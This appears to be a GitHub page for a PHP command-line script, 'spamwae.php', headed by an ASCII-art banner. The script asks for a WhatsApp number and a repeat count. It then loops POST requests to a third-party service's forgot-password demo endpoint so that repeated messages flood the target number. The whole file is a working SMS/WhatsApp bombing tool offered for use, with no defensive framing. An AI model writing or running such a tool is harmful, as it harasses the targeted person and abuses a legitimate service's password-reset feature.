-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathspamwae.php
46 lines (44 loc) · 2.09 KB
/
spamwae.php
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
<?php
function SpamWae($no_wa) {
$ch_spmwa_linax = curl_init();
curl_setopt($ch_spmwa_linax, CURLOPT_URL, 'https://fonnte.com/demo/forgot-password/proses-pesan.php');
curl_setopt($ch_spmwa_linax, CURLOPT_POSTFIELDS, "nomer=$no_wa");
curl_setopt($ch_spmwa_linax, CURLOPT_HEADER, 0);
curl_setopt($ch_spmwa_linax, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch_spmwa_linax, CURLOPT_TIMEOUT,30);
curl_setopt($ch_spmwa_linax, CURLOPT_POST, 1);
curl_exec($ch_spmwa_linax);
$linax_spmwa = curl_exec($ch_spmwa_linax);
curl_close($ch_spmwa_linax);
return $linax_spmwa;
}
system('clear');
echo "
\033[91m[I]==========[ \033[92mView Readme.md For Help (github.com/lutfianam) \033[91m]==========[I]\033[91m
@@@@@@ @@@@@@@ @@@@@@ @@@@@@@@@@ \033[92m@@@ @@@ @@@ @@@@@@ \033[91m@@@@@@@@
@@@@@@@ @@@@@@@@ @@@@@@@@ @@@@@@@@@@@ \033[92m@@@ @@@ @@@ @@@@@@@@ \033[91m@@@@@@@@
!@@ @@! @@@ @@! @@@ @@! @@! @@! \033[92m@@! @@! @@! @@! @@@ \033[91m@@!
!@! !@! @!@ !@! @!@ !@! !@! !@! \033[92m!@! !@! !@! !@! @!@ \033[91m!@!
!!@@!! @!@@!@! @!@!@!@! @!! !!@ @!@ \033[92m@!! !!@ @!@ @!@!@!@! \033[91m@!!!:!
!!@!!! !!@!!! !!!@!!!! !@! ! !@! \033[92m!@! !!! !@! !!!@!!!! \033[91m!!!!!:
!:! !!: !!: !!! !!: !!: \033[92m!!: !!: !!: !!: !!! \033[91m!!:
!:! :!: :!: !:! :!: :!: \033[92m:!: :!: :!: :!: !:! \033[91m:!:
:::: :: :: :: ::: ::: :: \033[92m:::: :: ::: :: ::: \033[91m:: ::::
:: : : : : : : : : \033[92m:: : : : : : : \033[91m: :: ::
\033[92m[</>]========[ \033[91mCoded By Lutfi Anam | Indonesia Security Lite \033[92m]========[<\>]
";
sleep(2);
echo "\033[92m [+] No. Target : ";
$no_wa = trim(fgets(STDIN));
sleep(1);
echo "\033[92m [+] Jumlah : ";
$jumlah = trim(fgets(STDIN));
sleep(1);
if (is_numeric($no_wa)) {
for ($i=1; $i <= $jumlah; $i++) {
echo ' Status : '.SpamWae($no_wa).' Ke '.$no_wa. PHP_EOL;
}
} else {
echo " Masukkan Nomor WA Dengan Benar\n Contoh : 08xxxxxxxxxx\n";
}
sleep(7);